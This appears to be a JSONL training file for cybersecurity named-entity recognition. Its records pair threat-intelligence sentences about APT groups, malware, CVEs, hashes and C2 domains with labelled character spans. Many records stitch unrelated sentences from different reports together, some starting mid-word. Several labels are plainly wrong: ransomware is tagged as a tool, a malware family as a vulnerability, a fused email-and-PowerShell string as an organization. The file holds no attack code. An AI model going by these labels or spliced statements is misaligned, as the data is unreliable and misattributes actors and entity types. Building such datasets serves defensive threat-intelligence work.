{"text": "UPDATE_PATTERNS – reregister in the administration panel . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 . Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts .", "spans": {"THREAT_ACTOR: OilRig": [[106, 112]], "ORGANIZATION: government": [[285, 295]], "MALWARE: N56.15.doc": [[298, 308]], "THREAT_ACTOR: Leafminer": [[418, 427]]}, "info": {"id": "cyberner_stix_train_001930", "source": "cyberner_stix_train"}}
{"text": "In a previous blog post we detailed the TRITON intrusion that impacted industrial control systems ( ICS ) at a critical infrastructure facility .", "spans": {"MALWARE: TRITON": [[40, 46]], "TOOL: industrial control systems": [[71, 97]], "TOOL: ICS": [[100, 103]]}, "info": {"id": "cyberner_stix_train_001931", "source": "cyberner_stix_train"}}
{"text": "A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting . Buhtrap is getting better at disguising the code they inject into compromised websites .", "spans": {"THREAT_ACTOR: Buhtrap": [[174, 181]], "MALWARE: compromised websites": [[240, 260]]}, "info": {"id": "cyberner_stix_train_001932", "source": "cyberner_stix_train"}}
{"text": "This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate .", "spans": {"MALWARE: document": [[5, 13]], "MALWARE: sub-domains": [[173, 184]], "VULNERABILITY: exploit": [[192, 199]]}, "info": {"id": "cyberner_stix_train_001933", "source": "cyberner_stix_train"}}
{"text": "To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others .", "spans": {"VULNERABILITY: Rocke group exploits vulnerabilities": [[52, 88]], "MALWARE: TClient": [[151, 158]]}, "info": {"id": "cyberner_stix_train_001934", "source": "cyberner_stix_train"}}
{"text": "The link leads to a phishing page that asks for banking login credentials or an account number and PIN . Lazarus used the open-source tool Invoke-PSImage , released December 20 , to embed the PowerShell script into the image file . The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives .", "spans": {"THREAT_ACTOR: Lazarus": [[105, 112]], "TOOL: Invoke-PSImage": [[139, 153]], "VULNERABILITY: zero-day exploits": [[258, 275]]}, "info": {"id": "cyberner_stix_train_001935", "source": "cyberner_stix_train"}}
{"text": "In order to infect the victims , the attackers distributed spear-phishing emails containing malicious word document which dropped a malware capable of spying on infected systems .", "spans": {"TOOL: emails": [[74, 80]], "TOOL: malicious word": [[92, 106]]}, "info": {"id": "cyberner_stix_train_001936", "source": "cyberner_stix_train"}}
{"text": "Ryuk was tailored to target enterprise environments and some of the modifications include removing anti-analysis checks . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": {"TOOL: Ryuk": [[0, 4]], "ORGANIZATION: Securelist": [[143, 153]], "VULNERABILITY: zero-day": [[183, 191]], "TOOL: Adobe Flash Player": [[192, 210]]}, "info": {"id": "cyberner_stix_train_001937", "source": "cyberner_stix_train"}}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]], "ORGANIZATION: customers": [[126, 135]], "VULNERABILITY: CVE-2012-0158": [[202, 215]], "VULNERABILITY: CVE-2013-3906": [[218, 231]], "VULNERABILITY: CVE-2014-1761": [[235, 248]]}, "info": {"id": "cyberner_stix_train_001938", "source": "cyberner_stix_train"}}
{"text": "Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 ( TG-1314 ) , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions .", "spans": {"ORGANIZATION: CTU": [[11, 14]], "THREAT_ACTOR: Threat Group-1314": [[68, 85]], "THREAT_ACTOR: TG-1314": [[88, 95]]}, "info": {"id": "cyberner_stix_train_001939", "source": "cyberner_stix_train"}}
{"text": "In fact , we saw yet another Duke malware toolset , OnionDuke , appear first in 2013 .", "spans": {"THREAT_ACTOR: Duke": [[29, 33]], "MALWARE: OnionDuke": [[52, 61]]}, "info": {"id": "cyberner_stix_train_001940", "source": "cyberner_stix_train"}}
{"text": "Their malware had not stayed undetected for those 4 and a half years .", "spans": {}, "info": {"id": "cyberner_stix_train_001941", "source": "cyberner_stix_train"}}
{"text": "When inserted , this method runs every time any Activity object in any Android app is created . Of all the samples we've tied to this activity so far noted in this blog , this is the only one configured to connect directly to an IP address for Command and Control ( C2 ) . In other words , while media organizations are important targets , it is possible that two separate groups are responsible for Hong Kong and Taiwan , respectively . Shortly thereafter , ESET ® researchers analyzed a sophisticated new malware , which is the main suspect in this case .", "spans": {"ORGANIZATION: ESET ® researchers": [[459, 477]], "MALWARE: new malware": [[503, 514]]}, "info": {"id": "cyberner_stix_train_001942", "source": "cyberner_stix_train"}}
{"text": "cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally . When activities targeting of civil society subsided , the actors instead appeared to have focused on external targets , such a series of attempts to spearphish the Danish Ministry of Foreign Affairs .", "spans": {"THREAT_ACTOR: cyber actors": [[0, 12]], "ORGANIZATION: media": [[47, 52]], "ORGANIZATION: aerospace": [[55, 64]], "ORGANIZATION: financial": [[67, 76]], "ORGANIZATION: critical infrastructure sectors": [[83, 114]], "ORGANIZATION: civil society": [[180, 193]]}, "info": {"id": "cyberner_stix_train_001943", "source": "cyberner_stix_train"}}
{"text": "The Intent object carries a string value as “ action ” parameter . Furthermore , FireEye has presented evidence indicating that the Ke3chang attackers have been active since at least 2010 and have attacked targets related to G20 meetings in the past . The attachment SHIPPING_MX00034900_PL_INV_pdf.zip makes this message stand . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": {"ORGANIZATION: FireEye": [[81, 88]], "THREAT_ACTOR: Ke3chang": [[132, 140]], "THREAT_ACTOR: attackers": [[141, 150]], "ORGANIZATION: G20 meetings": [[225, 237]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[267, 301]]}, "info": {"id": "cyberner_stix_train_001944", "source": "cyberner_stix_train"}}
{"text": "In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the LOC of operations of the South Sea Fleet of the PLA Navy .", "spans": {"VULNERABILITY: CVE-2012-0158": [[81, 94]], "THREAT_ACTOR: Anchor Panda": [[136, 148]], "ORGANIZATION: CrowdStrike": [[170, 181]]}, "info": {"id": "cyberner_stix_train_001945", "source": "cyberner_stix_train"}}
{"text": "Based on infrastructure overlaps and leaked information , we assess with high confidence that the malware we identified and present in this paper is linked to Wolf Research . In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS . The registry run key , in turn , points to the malware that has been dropped . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": {"ORGANIZATION: Wolf Research": [[159, 172]], "MALWARE: SocGholish": [[386, 396]], "MALWARE: Domen toolkit": [[403, 416]], "MALWARE: sczriptzzbn": [[499, 510]], "MALWARE: SolarMarker": [[519, 530]], "MALWARE: NetSupport RAT": [[546, 560]]}, "info": {"id": "cyberner_stix_train_001946", "source": "cyberner_stix_train"}}
{"text": "We also know Scarlet Mimic uses a number of toolkits to create documents that contain exploit code to install the FakeM payload on a compromised system . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[13, 26]], "TOOL: FakeM": [[114, 119]], "ORGANIZATION: consumer": [[231, 239]], "MALWARE: Carberp": [[331, 338]]}, "info": {"id": "cyberner_stix_train_001947", "source": "cyberner_stix_train"}}
{"text": "However , the C2 can send an updated list . MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 . The malware then proceeds to beacon to a configured remote server of cswksfwq.kfesv.xyz on TCP port 8080 . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": {"THREAT_ACTOR: MuddyWater": [[44, 54]], "THREAT_ACTOR: threat actor": [[82, 94]], "DOMAIN: cswksfwq.kfesv.xyz": [[202, 220]], "ORGANIZATION: Bradshaw": [[245, 253]], "ORGANIZATION: he and his then - girlfriend": [[283, 311]]}, "info": {"id": "cyberner_stix_train_001948", "source": "cyberner_stix_train"}}
{"text": "Find out more about the 7 Android Security Hacks You Need to Do Right Now to keep your mobile data safe . The Carbanak attacks targeting over a 100 financial institutions worldwide . as the block number is changed in each maturity level . For more information , contact : intelreports@kaspersky.comPowerShell event logs for the creation of an arbitrary process from PowerShell .", "spans": {"SYSTEM: Android": [[26, 33]], "ORGANIZATION: financial institutions": [[148, 170]], "ORGANIZATION: intelreports@kaspersky.comPowerShell": [[272, 308]], "TOOL: PowerShell": [[366, 376]]}, "info": {"id": "cyberner_stix_train_001949", "source": "cyberner_stix_train"}}
{"text": "This installs additional application from assets directory ( brother.apk ) and listens for PACKAGE_REMOVED events . For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 . Both Moafee and DragonOK favor spear-phishing emails as an attack vector , often employing a decoy to deceive the victim .", "spans": {"SYSTEM: brother.apk": [[61, 72]], "VULNERABILITY: zero-day vulnerability": [[134, 156]], "VULNERABILITY: CVE-2015-2545": [[167, 180]], "THREAT_ACTOR: PLATINUM": [[191, 199]], "THREAT_ACTOR: Moafee": [[251, 257]], "THREAT_ACTOR: DragonOK": [[262, 270]], "TOOL: emails": [[292, 298]]}, "info": {"id": "cyberner_stix_train_001950", "source": "cyberner_stix_train"}}
{"text": "XLoader also prevents victims from accessing the device ’ s settings or using a known antivirus ( AV ) app in the country . According to this new alert , Hidden Cobra the U.S government’s code name for Lazarus has been conducting FASTCash attacks stealing money from Automated Teller Machines (ATMs) from banks in Asia and Africa since at least 2016 . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor : a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 .", "spans": {"MALWARE: XLoader": [[0, 7]], "THREAT_ACTOR: Hidden Cobra": [[154, 166]], "ORGANIZATION: banks": [[305, 310]], "ORGANIZATION: CyberInt": [[378, 386]], "THREAT_ACTOR: TA505": [[462, 467]]}, "info": {"id": "cyberner_stix_train_001951", "source": "cyberner_stix_train"}}
{"text": "The commands above are commonly executed when the operators first connect to a newly activated backdoor .", "spans": {}, "info": {"id": "cyberner_stix_train_001952", "source": "cyberner_stix_train"}}
{"text": "The first attack occurred in early January of 2018 with an inbound WINDTAIL sample ( the backdoor family used by WINDSHIFT ) originating from the remote IP address 109.235.51.110 to a single internal IP address within the government agency . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data Exfiltration and to provide remote access to infected machines .", "spans": {"TOOL: WINDTAIL sample": [[67, 82]], "TOOL: WINDSHIFT": [[113, 122]], "ORGANIZATION: government agency": [[222, 239]], "MALWARE: Carbanak": [[242, 250]], "MALWARE: Carberp": [[293, 300]]}, "info": {"id": "cyberner_stix_train_001953", "source": "cyberner_stix_train"}}
{"text": "The handle has been credited with vulnerability research contributions to the Russian version of Hacker Magazine ( хакер ) .", "spans": {}, "info": {"id": "cyberner_stix_train_001954", "source": "cyberner_stix_train"}}
{"text": "The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: file": [[51, 55]], "MALWARE: C:\\WINDOWS\\tasksche.exe": [[56, 79]], "THREAT_ACTOR: Lazarus": [[126, 133]], "TOOL: emails": [[154, 160]], "ORGANIZATION: Bitcoin users": [[211, 224]], "ORGANIZATION: financial organizations": [[236, 259]]}, "info": {"id": "cyberner_stix_train_001955", "source": "cyberner_stix_train"}}
{"text": "For example , the threat actors deleted volume shadow copies after using them for NTDS.dit retrieval .", "spans": {"FILEPATH: NTDS.dit": [[82, 90]]}, "info": {"id": "cyberner_stix_train_001957", "source": "cyberner_stix_train"}}
{"text": "Phones ? This means that APT10 actors had two separate access points into the Visma network . In addition to the social engineering email technique , the attacker also employs a trick to the attachment .", "spans": {"THREAT_ACTOR: APT10": [[25, 30]], "TOOL: Visma network": [[78, 91]], "TOOL: email": [[132, 137]]}, "info": {"id": "cyberner_stix_train_001958", "source": "cyberner_stix_train"}}
{"text": "After being publicly denounced by CSIS Group — a threat intelligence company in Denmark — Wolf Research was closed and a new organization named LokD was created . Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ways . Available data on the IXESHE campaign indicates that targeted emails with malicious .PDF file attachments were the attackers ’ vector of choice . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": {"ORGANIZATION: CSIS Group": [[34, 44]], "ORGANIZATION: Wolf Research": [[90, 103]], "ORGANIZATION: LokD": [[144, 148]], "ORGANIZATION: Windows Defender ATP": [[163, 183]], "TOOL: LEAD": [[268, 272]], "TOOL: BARIUM": [[277, 283]], "THREAT_ACTOR: IXESHE": [[324, 330]], "TOOL: emails": [[364, 370]], "FILEPATH: .PDF": [[386, 390]], "SYSTEM: WordPress sites": [[513, 528]], "SYSTEM: WebDav server": [[562, 575]]}, "info": {"id": "cyberner_stix_train_001959", "source": "cyberner_stix_train"}}
{"text": "Its main purpose is to download archives and execute the “ start ” binary from them . In addition to spreading malware via spear fishing email with Office attachment containing either vulnerability or malicious macro , this group is particularly good at leveraging malicious Android APKs in the target attacks . Mandiant continues to track dozens of APT groups around the world ; however , this report is focused on the most prolific of these groups . Once the infected system locates the C2 , it receives encrypted backdoors that are obfuscated within GIF files and disguised as pictures that appear on a victim - s machine .", "spans": {"TOOL: Android APKs": [[275, 287]], "ORGANIZATION: Mandiant": [[312, 320]], "ORGANIZATION: infected system": [[461, 476]], "SYSTEM: C2": [[489, 491]]}, "info": {"id": "cyberner_stix_train_001960", "source": "cyberner_stix_train"}}
{"text": "In this latest incident , Transparent Tribe registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . We were soon able to help investigate another incident involving Lurk .", "spans": {"ORGANIZATION: government officials": [[171, 191]], "MALWARE: Lurk": [[275, 279]]}, "info": {"id": "cyberner_stix_train_001961", "source": "cyberner_stix_train"}}
{"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[0, 14], [54, 68]], "ORGANIZATION: maritime-related": [[94, 110]], "ORGANIZATION: engineering firms": [[157, 174]], "ORGANIZATION: shipping": [[177, 185]], "ORGANIZATION: transportation": [[190, 204]], "ORGANIZATION: manufacturing": [[207, 220]], "ORGANIZATION: defense": [[223, 230]], "ORGANIZATION: government": [[233, 243]], "ORGANIZATION: research universities": [[258, 279]], "THREAT_ACTOR: APT33": [[312, 317]], "ORGANIZATION: organization": [[345, 357]], "ORGANIZATION: business conglomerate": [[377, 398]], "FILEPATH: malicious file": [[407, 421]], "ORGANIZATION: petrochemical company": [[494, 515]]}, "info": {"id": "cyberner_stix_train_001962", "source": "cyberner_stix_train"}}
{"text": "Both sources can be found here and here . Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks . THREEBYTE : 16e627dbe730488b1c3d448bfc9096e2 . They also used AdFind to enumerate domains and to discover trust between federated domains .", "spans": {"MALWARE: THREEBYTE": [[197, 206]], "FILEPATH: 16e627dbe730488b1c3d448bfc9096e2": [[209, 241]], "TOOL: AdFind": [[259, 265]]}, "info": {"id": "cyberner_stix_train_001963", "source": "cyberner_stix_train"}}
{"text": "The biggest number of Orangeworm 's victims are located in the U.S. , accounting for 17 percent of the infection rate by region . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": {"THREAT_ACTOR: cybercrime gang": [[147, 162]], "ORGANIZATION: banks": [[188, 193]], "ORGANIZATION: e-payment": [[196, 205]], "ORGANIZATION: financial institutions": [[218, 240]], "MALWARE: Carbanak": [[290, 298]], "MALWARE: Cobalt": [[303, 309]]}, "info": {"id": "cyberner_stix_train_001964", "source": "cyberner_stix_train"}}
{"text": "We saw the message uploaded to the attackers ’ server within a second – see Figure 7 . This new research confirms our forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to conduct intrusion . This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA .", "spans": {"THREAT_ACTOR: Turla": [[146, 151]], "TOOL: frameworks": [[207, 217]], "THREAT_ACTOR: HIDDEN COBRA": [[395, 407]]}, "info": {"id": "cyberner_stix_train_001965", "source": "cyberner_stix_train"}}
{"text": "The malware may inject itself into browser processes and explorer.exe . However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": {"TOOL: malware": [[4, 11]], "MALWARE: explorer.exe": [[57, 69]], "TOOL: emails": [[96, 102]], "ORGANIZATION: bank employees": [[116, 130]]}, "info": {"id": "cyberner_stix_train_001966", "source": "cyberner_stix_train"}}
{"text": "] 16 lala513.gicp [ . APT41 leveraged ROCKBOOT as a persistence mechanism for PHOTO and TERA backdoors . The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same ACT .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]], "TOOL: ROCKBOOT": [[38, 46]], "THREAT_ACTOR: Dukes": [[109, 114], [310, 315]]}, "info": {"id": "cyberner_stix_train_001967", "source": "cyberner_stix_train"}}
{"text": "Blackfly began with a campaign to steal certificates , which were later used to sign malware used in targeted attacks .", "spans": {"THREAT_ACTOR: Blackfly": [[0, 8]]}, "info": {"id": "cyberner_stix_train_001968", "source": "cyberner_stix_train"}}
{"text": "The following day , TEMP.Veles again tried the utility on a compromised system .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[20, 30]]}, "info": {"id": "cyberner_stix_train_001969", "source": "cyberner_stix_train"}}
{"text": "Based on analysis of the group's SWCs , TG-3390 operations likely affect organizations in other countries and verticals .", "spans": {"TOOL: SWCs": [[33, 37]], "THREAT_ACTOR: TG-3390": [[40, 47]]}, "info": {"id": "cyberner_stix_train_001970", "source": "cyberner_stix_train"}}
{"text": "Change server request The URL 's for the new server is obfuscated , preventing easy network identification . Depending on each sample , the content of document is either a fake resume application , or a letter from the Ministry of Justice in Lebanon or Saudi Arabia . KHRAT : SHA256 : aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380 . A month later , GReAT discovered two more previously unknown infection mechanisms for MiniDuke , which relied on Java and Internet Explorer vulnerabilities to infect the victim ’s PC .", "spans": {"TOOL: fake resume application": [[172, 195]], "TOOL: letter": [[203, 209]], "MALWARE: KHRAT": [[268, 273]], "FILEPATH: aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380": [[285, 344]], "ORGANIZATION: GReAT": [[363, 368]], "MALWARE: MiniDuke": [[433, 441]], "VULNERABILITY: Java and Internet Explorer vulnerabilities": [[460, 502]]}, "info": {"id": "cyberner_stix_train_001971", "source": "cyberner_stix_train"}}
{"text": "By releasing ReelPhish , we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism . The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor .", "spans": {"ORGANIZATION: Mandiant": [[31, 39]], "TOOL: emails": [[186, 192]], "FILEPATH: Hancitor": [[311, 319]]}, "info": {"id": "cyberner_stix_train_001973", "source": "cyberner_stix_train"}}
{"text": "To be installed , it needs the victim to allow installation of apps from unknown sources in the device settings . The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions . Based on the compilation dates of the binaries , the campaign took place in the same period .", "spans": {"ORGANIZATION: FireEye": [[118, 125]], "ORGANIZATION: iSIGHT": [[126, 132]], "ORGANIZATION: Mandiant": [[229, 237]], "THREAT_ACTOR: APT32": [[256, 261]]}, "info": {"id": "cyberner_stix_train_001974", "source": "cyberner_stix_train"}}
{"text": "Windows Defender ATP continuously monitors protected systems for such indicators of hostile activity and alerts security operations center ( SOC ) personnel to their presence .", "spans": {"TOOL: Windows Defender ATP": [[0, 20]], "TOOL: security operations center": [[112, 138]], "TOOL: SOC": [[141, 144]]}, "info": {"id": "cyberner_stix_train_001975", "source": "cyberner_stix_train"}}
{"text": "SHA256 : 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f .", "spans": {"FILEPATH: 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f": [[9, 73]]}, "info": {"id": "cyberner_stix_train_001976", "source": "cyberner_stix_train"}}
{"text": "Detecting threat actors who are \" living off the land , \" using credentials , systems , and tools they collect along the way instead of backdoors , can be challenging for organizations that focus their instrumentation and controls primarily on the detection of malware and indicators such as command and control IP addresses , domains , and protocols .", "spans": {}, "info": {"id": "cyberner_stix_train_001977", "source": "cyberner_stix_train"}}
{"text": "To get around this challenge , TrickMo ’ s developers added some new features to steal TANs using screen video recording and screen data scraping . The HawkEye malware is primarily used for credential theft and is often combined with additional tools to extract passwords from email and web browser applications . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"MALWARE: TrickMo": [[31, 38]], "TOOL: HawkEye malware": [[152, 167]], "MALWARE: POWRUNER": [[314, 322]], "MALWARE: malicious RTF": [[345, 358]], "VULNERABILITY: CVE-2017-0199": [[379, 392]]}, "info": {"id": "cyberner_stix_train_001978", "source": "cyberner_stix_train"}}
{"text": "Instead of being controlled by a traditional command-and-control server , it receives instructions via tweets . Many feel that they have a home team advantage living in Nigeria , where they are free to pay off law enforcement to look the other way . The Lazarus Group was first identified in Novetta 's report Operation Blockbuster in February 2016 .", "spans": {"THREAT_ACTOR: they": [[185, 189]], "THREAT_ACTOR: Lazarus Group": [[254, 267]], "ORGANIZATION: Novetta": [[292, 299]]}, "info": {"id": "cyberner_stix_train_001979", "source": "cyberner_stix_train"}}
{"text": "sms_send : to send C2-specified SMS messages to C2-specified recipients . While the malware deployed is not terribly sophisticated , it uses techniques such as DNS command and control ( C2 ) that allows it to stay under the radar at many establishments . The dropper , along with the Python RAT E-TOOL , attempts to gather information on the victim 's machine and then uses multiple cloud services : Google Drive , Twitter , ImgBB and Google Forms . As well as its custom malware , Budworm also used a variety of livingofftheland and publicly available tools in these attacks .", "spans": {"TOOL: Python": [[284, 290]], "TOOL: RAT E-TOOL": [[291, 301]], "TOOL: Google Drive": [[400, 412]], "TOOL: Twitter": [[415, 422]], "TOOL: ImgBB": [[425, 430]], "TOOL: Google Forms": [[435, 447]], "MALWARE: malware": [[472, 479]], "THREAT_ACTOR: Budworm": [[482, 489]], "TOOL: livingofftheland and publicly available tools": [[513, 558]]}, "info": {"id": "cyberner_stix_train_001980", "source": "cyberner_stix_train"}}
{"text": "FakeSpy is under active development and is evolving rapidly ; new versions are released every week with additional evasion techniques and capabilities . The activity surfaced in Southeast Asia , a region where APT10 frequently operates . The scripts would also use wget to send POST requests to command and control ( C2 ) servers that would contain information about the compromised system .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: APT10": [[210, 215]], "MALWARE: wget": [[265, 269]], "TOOL: C2": [[317, 319]]}, "info": {"id": "cyberner_stix_train_001981", "source": "cyberner_stix_train"}}
{"text": "Specifically , carefully consider which ports should be connecting outbound versus inbound .", "spans": {}, "info": {"id": "cyberner_stix_train_001982", "source": "cyberner_stix_train"}}
{"text": "Figure 7 . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . Through its light weight and modular architecture , the GRIFFON implant is the perfect validator . Greatness , for now , is only focused on Microsoft 365 phishing pages , providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages .", "spans": {"VULNERABILITY: CVE-2016-4117": [[88, 101]], "MALWARE: GRIFFON": [[189, 196]], "THREAT_ACTOR: Greatness": [[232, 241]], "THREAT_ACTOR: Microsoft 365 phishing pages": [[273, 301]]}, "info": {"id": "cyberner_stix_train_001983", "source": "cyberner_stix_train"}}
{"text": "Microsoft Threat Intelligence continually tracks activity groups such as LEAD and BARIUM and documents the tactics , techniques , and procedures they employ in their attacks , with a special focus on the tools and infrastructure they use to facilitate those attacks .", "spans": {"ORGANIZATION: Microsoft Threat Intelligence": [[0, 29]], "THREAT_ACTOR: LEAD": [[73, 77]], "THREAT_ACTOR: BARIUM": [[82, 88]]}, "info": {"id": "cyberner_stix_train_001984", "source": "cyberner_stix_train"}}
{"text": "In this second version , the developer ’ s name listed was “ concipit1248 ” in Google Play , and may have been active between May 2019 to February 2020 . In 2015 , Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups . in the third case that was implemented , Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": {"SYSTEM: Google Play": [[79, 90]], "ORGANIZATION: Kaspersky Lab": [[164, 177]], "THREAT_ACTOR: groups": [[285, 291]], "VULNERABILITY: CVE-2022 - 41080": [[453, 469]]}, "info": {"id": "cyberner_stix_train_001985", "source": "cyberner_stix_train"}}
{"text": "You can check if your account is compromised by accessing the following web site that we created : https : //gooligan.checkpoint.com/ . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . If the code pattern is matched with the definitions , Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": {"THREAT_ACTOR: APT38": [[136, 141]], "ORGANIZATION: banks": [[187, 192]], "ORGANIZATION: financial institutions": [[203, 225]]}, "info": {"id": "cyberner_stix_train_001986", "source": "cyberner_stix_train"}}
{"text": "Figure 22 : world infection heat map Considering that India is by far the most infected county by “ Agent Smith ” , overall compromised device brand distribution is heavily influenced by brand popularity among Indian Android users : Figure 23 : infected brand distribution While most infections occurred on devices running Android 5 and 6 , we also see a considerable number of successful attacks against newer Android versions . Tweety Chat 's Android version can record audio , too . This leads to the generation of a different ZIP archive and , in turn , a unique MSI package , each time the attacker bundles the files together . the web shell included the ability to run arbitrary commands and upload , delete , and view the contents of files .", "spans": {"MALWARE: Agent Smith": [[100, 111]], "SYSTEM: Android": [[217, 224], [411, 418]], "SYSTEM: Android 5 and 6": [[323, 338]], "TOOL: Tweety Chat": [[430, 441]], "TOOL: ZIP archive": [[530, 541]], "TOOL: MSI": [[567, 570]]}, "info": {"id": "cyberner_stix_train_001987", "source": "cyberner_stix_train"}}
{"text": "It is of interest primarily because it operates in conjunction with various banking win32-Trojans . By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016 . We have analyzed the most common version of ZxShell , version 3.10 . None The Foudre string no longer present The window used for keylogging was originally named Foudre giving the malware its name , but has now been renamed to form1 to help the malware evade signaturebased detection", "spans": {"SYSTEM: win32-Trojans": [[84, 97]], "THREAT_ACTOR: Turla": [[153, 158]], "MALWARE: ZxShell": [[293, 300]]}, "info": {"id": "cyberner_stix_train_001988", "source": "cyberner_stix_train"}}
{"text": "] net . In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER (due to the project name ATMRIPPER” identified in the sample) and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand . Filename: winload.exe .", "spans": {"ORGANIZATION: FireEye": [[23, 30]], "MALWARE: ATM malware": [[54, 65]], "MALWARE: RIPPER": [[86, 92]], "ORGANIZATION: banks": [[266, 271]], "FILEPATH: winload.exe": [[296, 307]]}, "info": {"id": "cyberner_stix_train_001989", "source": "cyberner_stix_train"}}
